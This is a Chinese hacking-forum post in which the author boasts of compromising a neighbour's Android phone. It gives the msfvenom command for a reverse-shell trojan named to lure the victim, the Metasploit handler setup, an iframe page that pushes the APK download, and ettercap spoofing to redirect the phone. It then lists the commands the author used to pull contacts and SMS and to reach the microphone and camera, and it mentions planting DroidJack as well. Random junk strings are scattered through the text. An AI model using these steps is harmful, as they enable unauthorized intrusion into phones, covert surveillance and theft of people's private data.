找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2309|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

0 y3 P3 i3 k, t I& ^ 五、msf+ettercap入侵邻居安卓手机 1 L; M4 n9 b/ Y2 P( w. Q. K

( Y B( w/ n* K% j% i- g

6 S; }/ B Z- g; |& a0 F( D 首先启动msf 8 q" Z; c o( i; Z8 C9 j) L1 B

, p6 l+ R+ ~" \! ?+ M! @* G1 h

_$ [. e( ?) k" r/ K4 w W 先用kali生成一个安卓木马,如下命令: 6 t+ f/ x; I9 i

/ k* B4 B8 [. _7 s3 C0 i

7 V9 h' V2 e1 B$ @" y H Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk , y& i5 W! @9 o& ^. Y

/ r0 F, I4 ?+ R: n' z! Q

8 d& h. F' v/ N; L+ P+ z 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 , ^, A" k Q* [4 X0 P, ^% A

- M" E5 d/ Y+ G

8 W6 Q- O, T3 j/ S- f 然后进入msf / ^- v1 |% Z$ r& w6 d- L& e8 v

6 L' ~' G& u$ v* n. {8 ]

) H" Z; } o1 F3 x use exploit/multi/handler ; Q1 ~1 x/ P. n0 O0 G* u9 C! D# j* n$ u" ?

, @. r% P( f2 W; X

! _9 ]3 e! ~2 ]4 U- z2 m" x: s+ ` set payload android/meterpreter/reverse_tcp ! c" T& j% m5 s+ k( J- F* g

1 K7 i' v+ ?; M1 ?+ f

$ z4 e% l: X+ d s) n set LHOST 192.168.0.109 //ipkailiip * W% y9 l4 @/ I9 T D6 I

$ x! ~ |( k( u( ~4 ]4 K

5 ^! B( g1 m! K9 {, o# ] set LPORT 44444 //端口一定要与前面生成的木马的端口一致 6 A' z9 k, n, w: G

4 z5 A6 w: R" I/ v

, l, c( _+ `5 P: @0 K Exploit " W! T3 G$ I8 X4 C$ L

; i1 D2 Z7 v: E* F) p& i) d% k# ?( |" s

, w) l! F9 U3 m! C- ?6 f e- i* `/ s8 l   & Q" r+ `" O! Q7 T

0 b! I. w3 t: t, J% t

, V% N, |1 ~2 Z% Q5 N" a* ? 下面我们开启ettercap -G : ~% i/ j' g% N) ~

. z/ G3 H9 N* U

; {% j- s* u* t 我物理IP 5 ?9 d: q' y: `! x' ~

0 I0 [. M$ I% o- ~+ E

& |+ X* a+ U4 z& S& Z, G7 Z' z1 N   7 b" A/ c4 ^; X) u

$ f [$ c3 @* J9 X

. h l4 s# S$ y5 t+ W, z 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ! f: E: ^& x; q: s

2 w" x1 E% X* X# |: V4 x4 Y; G5 |

( _* r5 C5 T& g5 f q2 G* K 下面我们来设置一下 $ M, R# b0 V- a' y3 s

5 j8 z7 A( k. \* a2 x

4 \. O8 c4 `- u2 M   $ a# ~; q( E0 Y- u n$ |- m7 A( M

* d: C( c1 {2 X3 o9 \9 L

% d% D' j: Y- R x 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 8 k( d7 W; o5 @. V

4 l. H/ Q- s) o( @8 Q# D

9 j/ D4 p9 T W S$ v8 o   Z, C% I& l6 O" d/ d& `5 o

9 a& V& Q) D# e/ e

, ?6 ^) Z$ g2 X5 J4 {; A4 z. _2 l, p3 t   * g% V8 n- C) r8 G& I# M5 x

Q: E( ]( i( ?: h$ g6 w

3 D0 C0 }6 K. ~( y9 A! l   4 r o" C: ]4 _9 C

/ U# p, |/ J& \4 L F- g2 P

5 U! {! y5 _' u# N9 A' D   / O! `/ G( u! L

: S+ I- @3 x, M( G! ^( @( f

; u# c% g4 w9 ~% _; x   0 H5 j$ A1 b' T: L' ? K' s1 u

B- h; b; p2 y) m0 S

9 p/ D+ k6 e% `9 c8 ~6 \3 ?   7 r2 Y6 x" |. W: z; a# c, M, y

" G9 u N' ?* z5 d

$ t4 J2 P, n0 P8 t   - h) D1 M/ i9 S( ~' P

3 d7 K% R, U5 X& `( ~+ D4 G. ^: U& e8 }

* H- [. @# t; i   " [5 l+ h7 L- N5 K4 ~8 a: s

! h% G) [0 ]8 R% A# e3 p! O) j7 O

3 _" O$ z* e. ~2 | x& S   - i& B! U' _1 n2 }+ j/ }8 [

( o& k" m1 U. A, M/ X$ G2 k% z4 _

# }9 N+ o* E) U/ G9 X   / R+ k% `8 ?% M' t' Y8 o& a

* W' D9 Y# O0 [7 _

+ p+ A P6 i' H: z   ) w" N4 |, R% V3 ]# d

8 e0 R9 o' s% g, I% m& y

# d* h% x8 L6 B2 K$ P+ W9 `   2 Y2 } o/ ~8 Y# m% s6 w( h

/ }3 F: C2 B4 }& M

' j! ~& i% R: J   8 `0 x! W# U0 H: V

e J% w$ k4 N& ~: S( w4 T" r: o

/ X3 h, I# j6 r5 x: c, q3 j 下面我们开始攻击 5 h4 f6 ]6 j: d9 o3 {" N/ [

* V3 D' g5 Q+ V$ Q

# I* j, w) y* n- Q m2 p9 c, P   5 ]/ ?! n* i& m4 y8 S3 q

% f6 U: k. A3 h( [' [1 M

$ H, O1 T% r' o6 Z. m   / F/ s- Y6 ?& }) P4 m+ x7 P& h

% |0 w* d, `" V6 @

6 Y& i- L* R6 z% o% V3 G6 i3 a   - L, ^: v9 G6 \. Q# m4 v& u

1 n' u% H; P( X' }

# j1 R# ]7 O! s% Z/ V }- m   " m, o% ^5 m- k0 l I% B

6 q. v/ s5 L# b7 q

, E2 ^9 Y+ H. B$ \' k& Y   4 p' q: C; l' I, i3 s

; s0 g4 o$ v& k5 U1 l

0 D8 H1 M. `. v" c! t 大概过了5分钟多,发现反弹成功了 , F) \+ s/ P5 I9 v( E* ? o

3 s1 u, T1 u( z% [1 L/ U+ Y; G

# J' z7 e" l% r& A' H D, m: {   7 U' c* {' G( `* C) b

4 N) Z6 q6 f7 E. d/ C

) }" {. x: ~$ c' z& ~' D2 B   $ q( e; ~9 u0 I7 ?( E: W# _

6 B9 X7 y; w( W2 N- k2 V& v

4 ?2 _+ r; n; C+ f1 B F   ' s6 h5 k6 p) M9 x" ~( f1 S

( d6 a9 y- u+ o4 y1 a) n) _% i7 Q! {

- z; p- ~' _- U# X   & w# k/ |) y: E$ {5 m/ M

8 \. g; X* i, n. \

) N$ Y/ U* f) W, Y   8 o- c4 x* E: {1 ~5 z2 J

& D, T0 X" F# ^) u6 h- R) N

- V% ?. Y" q/ Q! _8 c" k   ( u/ I; Q& g. E% U/ K! U6 L' G3 \

5 f! G; r7 n6 V/ N9 A5 `

, g, S, V" d* @7 e   0 W& f: i8 |. Y/ H5 O+ K# e; l

_. N. q+ ~8 k7 B

/ N, o7 R$ w( t+ ? 执行命令 3 ]4 C6 f/ N( S/ ?

, h" ~2 M: [. m) s, {: n/ I* E

+ [# r+ k; |5 u( q   $ _! y" ?+ b% M9 m9 L, k7 o

! [5 v5 h) j& u6 G( D0 M

3 g& {5 R. P# Q& V dump_contacts    --》这个是导出电话 + ~9 L- Q! T' e S! U* ~/ C: f+ I; }

1 s% m2 C6 f: v' N. _, `* ?

7 g! g. w/ ?) L C+ b; l dump_sms --》这个是导出信息 * j7 e3 O( Z1 F/ A) R% }4 G% M

, F6 D( }* o% R) z# j9 @0 W

! Q* N5 s/ s8 }* I/ C record_mic     Record audio from the default microphone for X seconds ' j( e% x" x0 |

0 L$ A4 j s7 N1 _9 y- h

; {5 F+ o8 X- \8 c5 G1 l9 }' w     webcam_chat    Start a video chat 8 P: s2 v* |% ~

+ }; w$ ~9 d: N4 r, x

; J: T: F3 @0 s2 Y     webcam_list    List webcams 7 {4 o. d+ F z' |5 F

" S" I2 q w$ \& G' V4 B& T' r" w2 r

' O/ W2 y0 E. q( v, b     webcam_snap    Take a snapshot from the specified webcam $ u! i0 u# E! D' j4 p0 w6 F6 I8 n

$ G& T' M! Y6 q) Q

1 R5 e) f" W% _ webcam_stream  lay a video stream from the specified webcam 1 J8 E8 d( [- V# z6 P2 }

+ ~: z/ x% } A$ }9 C% \8 d

- P, B* i2 o P+ m   $ L8 w- _% g, T1 j5 X/ E

3 o. p: y- d! B! Y6 ~- `3 D2 X

1 @: R* ^1 m' p" o2 [* N   6 a n4 ?0 \# g9 B d" w+ H

, d% x, D' J. J* i

0 q9 S5 Y, F) u" S. |, p 我们打开看一下电话薄, 9 t+ m; Q) ~/ `3 f& F! h& c) P

1 ~3 C/ U. P% a6 g" Z8 r/ T' R

6 X' I% c: d6 w1 d" f) u) M   , F$ k: x) j3 M0 V- m5 v

/ E: ?* L# b) h

1 i1 A' L- V0 U" H   ) a g* r2 q7 Y8 F' N1 U

6 P* W( V- s- Y% t

- J+ K; g; ~$ Z. A   + W- c! u; p# f. X7 K- d

4 ^6 i4 |( [6 X3 O: k

; O/ e u7 w) A8 h   6 J1 U/ h0 I; e# c2 \5 ]6 t1 ^5 U

i+ U+ Z0 M3 \$ H

3 A# [/ U/ b2 B8 Y. e   ; A( P% U' {8 p* N6 n

4 s1 ^8 x: V3 _8 I+ O" _

. S) J0 ]6 X% {7 b/ m$ _& _   * Y$ u3 h2 ?! ^

. u, ]6 n& M! W1 n" u) M3 o

, D& [0 p ]3 L 我们同时欺骗成DroidJack木马,使用方法如图: Q/ K; b- l5 c

9 R: c/ ?3 u$ y% [& B% K! L E2 H2 t

3 ?3 Q: K" |& H' v$ R   + E' m2 Y9 p6 t' N* _+ R

+ u o% o1 \! s* w$ T

" V0 p2 q4 l4 s   ' m* P" \- a. P

- m4 j& a( V* G/ b

# p& m, ^, f: A8 [; J8 M" f   " Y# N- ^4 e$ T5 d1 t N% }

' q' p! P) n2 Y

# a( e+ t$ k* q( g' l 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 $ ^* L" ^1 {- D" i' L

4 Y& Y2 W7 f" d, x9 G

4 o* l' L( m/ m! g C; r1 Y9 Z& I   + i+ C3 @0 e/ E) }6 H: Y

8 ]& A% i; z' h1 ?% m* m; B

) p( L$ s' ~% O5 F: f' Y) }   O% ^; D1 x/ H% j

" R! r4 W' d/ [# b8 ^ k% L( {

; ]) F6 c/ J& y" K% {/ {   4 w# d# w7 ^+ b) j

9 o/ V! u" |' n8 r) H' U

: i& S: `( z. S: ~, G0 s3 [8 Y7 ? ) G2 T. j4 q- j

+ K- I; j! J) A: s1 Z E3 G5 m

0 ~) f& F/ s. U# O4 a; Q
1 p. P: W, @7 Y, `' U

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表